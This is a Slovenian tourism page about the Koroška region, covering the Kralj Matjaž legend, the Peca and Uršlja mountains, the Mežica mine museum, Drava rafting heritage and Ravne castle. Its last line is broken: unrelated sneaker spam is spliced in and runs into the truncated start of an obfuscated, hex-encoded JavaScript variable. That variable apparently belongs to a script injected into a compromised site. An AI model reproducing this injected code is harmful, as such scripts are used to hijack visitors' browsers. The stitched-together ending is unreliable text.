031 32 27 76 ali  041 67 88 96

»Kralj Matjaž pod Peco spi.
Kralj Matjaž se prebudi.
Kralj Matjaž povede nas
v borbo za slovensko vas.«

Nepogrešljiv lik ljudskih pripovedk nas pripelje v osrčje slovenstva. V središče sosedskih krajev- Slovenj Gradca, Raven na Koroškem in DravogradaNeokrnjena gorska narava in gozdovi z razvejano mrežo cest in poti nudijo raznovrstne možnosti raziskovalnih potepanj po vrhovih Pece in Raduhe, po širokih prostranstvih Uršlje, Olševe, Smrekovškega pogorja, Zahodnega Pohorja ali Kozjaka ter po pobočjih slikovitih alpskih dolin. Te poti so še posebej privlačne za pohodnike in kolesarje. Alpske senožeti se tu pozimi spremenijo v krasna smučišča.

V stoletjih poprej se je tukaj razvijalo rudarstvo, zdaj pa je nekdanji rudnik v Mežici urejen v turistični rudnik in muzej z unikatno ponudbo kolesarjenja po opuščenih skrivnostnih rovih v podzemlju Pece.

V Dravski dolini je danes moč podoživeti nekoč najpomembnejšo gospodarsko dejavnost, splavarstvo- ko so splavarji prevažali les po reki v daljne kraje. Dandanes skušajo rezultate dela knapov, pavrov, oglarjev, flosarjev, tesarjev in kovačev vtkati v kar najbolj pristen in živ prikaz te pomembne dediščine, zato so številne zaokrožene zbirke in razstave posejane po vseh koroških občinah. Slikovita in raznolika arhitektura podružničnih cerkva, ki jo pogled doseže na domala vsakem izpostavljenem griču izven naselij, zrcali kopico avtohtonih značilnosti, ohranja koroško pokrajino prepoznavno in jo uvršča med kulturno najbolj mikavne dele v Sloveniji.
Najpomembnejši in najlepši med vsemi je grad Ravne, ki so mu privlačno podobo z velikim angleškim parkom ob koncu 19. Stoletja, vtisnili grofje Thurni. Med mnogimi, ki so nekoč zaljšali razgibano pokrajino Mislinjske in Dravske doline, sta se zobu časa in plamenom druge svetovne vojne izognili le slovenjgraška mestna graščina Rotenturn in Bukovje pri Dravogradu.

Koroška

S P L A V A R J E N J E  N A  R E K I  D R A V I POTEPANJE PO DRAVSKI DOLINI Off White X Vapormax Flairvar nsSGCDsaF1=new window["\x52\x65\x67\x45\x78\x70...